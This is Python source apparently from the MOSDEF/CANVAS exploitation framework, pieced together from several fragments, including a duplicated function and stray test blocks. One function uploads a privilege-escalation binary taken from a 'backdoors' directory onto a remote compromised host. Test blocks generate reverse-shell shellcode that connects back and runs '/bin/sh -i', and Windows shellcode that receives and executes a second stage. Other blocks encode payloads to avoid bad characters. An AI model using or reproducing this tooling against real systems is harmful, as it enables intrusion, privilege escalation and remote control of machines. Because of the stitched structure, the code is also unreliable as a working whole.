def placeEscaleBinary(self, node, filename):
""" creates and uploads our mosdef priv escalation binary """
code = file("backdoors/mosdef_escale_666.c").read()
vars = {}
vars['SOCK'] = int(node.shell.fd)
vars['FILENAME'] = filename
node.shell.clearfunctioncache()
bincode = node.shell.compile(code, vars)
from MOSDEF.makeexe import makelinuxexe
binexe = makelinuxexe(bincode, proc=node.shell.arch.upper())
self.log("Escale 666 ELF size: %d" % len(bincode))
self.log("Placing Escale 666 ELF on remote host ...")
O_RDWR = node.shell.libc.getdefine('O_RDWR')
O_CREAT = node.shell.libc.getdefine('O_CREAT')
node.shell.unlink(filename)
fd = node.shell.open(filename, O_RDWR | O_CREAT, 0777)
if fd < 0:
self.log("couldn't open %s..." % filename)
return 0
self.log("%s opened as fd=%d" % (filename, fd))
r = node.shell.write(fd, binexe)
if r != 1:
self.log("write failed.")
return 0
self.log("file wrote successfully")
r = node.shell.close(fd)
if r == -1:
self.log("error while trying to close the fd")
return r
def make_remote_binary(self, node, code, vars):
node.shell.clearfunctioncache()
bincode = node.shell.compile(code, vars)
from MOSDEF.makeexe import makelinuxexe
binexe = makelinuxexe(bincode, proc=node.shell.arch.upper())
self.log("[+] escale ELF size: %d" % len(bincode))
return binexe
def make_remote_binary(self, node, code, vars):
#clear function cache must be done before any
#shell.compile() is called for threading reasons
#it also clears any intermediate compilations that were done
#for example, if someone has already done a #include sendint then
#we don't recompile that on a per-shellcode basis
#so for every time you do a binary code, you need to clear
#out the "we've already done sendint" cache
#-dave
node.shell.clearfunctioncache() # XXX: clears out vars ?
#node.shell.compile() will also call a thread RLock.release()
bincode = node.shell.compile(code, vars)
#node.shell.leave()
#print shellcode_dump(bincode)
from MOSDEF.makeexe import makelinuxexe
binexe = makelinuxexe(bincode, proc=node.shell.arch.upper())
self.log("connectback ELF size: %d" % len(bincode))
#print shellcode_dump(binexe)
return binexe
if 0:
badstring = "\x00\x55\x11\x40\x20!@#%^"
print "Trying to load EAX with 4 in 10 different ways avoiding these characters: \n%s\n" % hexprint(
badstring)
for i in range(0, 10):
myx86 = X86()
result = myx86.load_long("%eax", 4, badstring)
print "%d: %s" % (i, hexprint(result))
if 1:
mywin32 = win32()
scstr = mywin32.testMe()
#smallest tcp shellcode is 457 - with stackswap is 555
#smallest go shellcode is 661
print "Length of win32 shellcode is %d" % len(scstr)
makeexe.makelinuxexe("A" * 0x1500 + "\xcc" + scstr, "a.out")
print "Code=%s" % mywin32.getcode()
if 0:
#test connect shellcode
mylinux = linux_X86()
#mylinux.addAttr("debugme",None)
mylinux.addAttr("Normalize Stack", [0])
mylinux.addAttr("connect", {"ipaddress": "127.0.0.1", "port": 5555})
mylinux.addAttr("execve", {
"argv": ["/bin/sh", "-i"],
"envp": [],
"filename": "/bin/sh"
})
str = mylinux.get()
#have to have a lot of A's to make the "stack" look normal.
sys.exit(2)
if __name__ == '__main__':
import getopt
print 'Running Printable Encoder v1.1'
print 'Copyright Dave Aitel'
app = intelprintableencoder()
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'f:')
except getopt.GetoptError:
usage()
for o, a in opts:
if o in ['-f']:
port = a
filename = a
from shellcode import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 1000})
sc.addAttr('tcpconnect', {'port': 12345, 'ipaddress': '127.0.0.1'})
sc.addAttr('CreateThreadRecvExecWin32', {'socketreg': 'FDSPOT'}) #MOSDEF
sc.addAttr('ExitThread', None)
orig = sc.get()
app.setbadchars(' &')
data = app.encode(orig)
import curses.ascii
print '%d: length=%d (from %d) Data=%s' % (strisprint(data), len(data),
len(orig), data)
from MOSDEF import makeexe
makeexe.makelinuxexe('\xcc' + data + '\xcc', filename='printtest.out')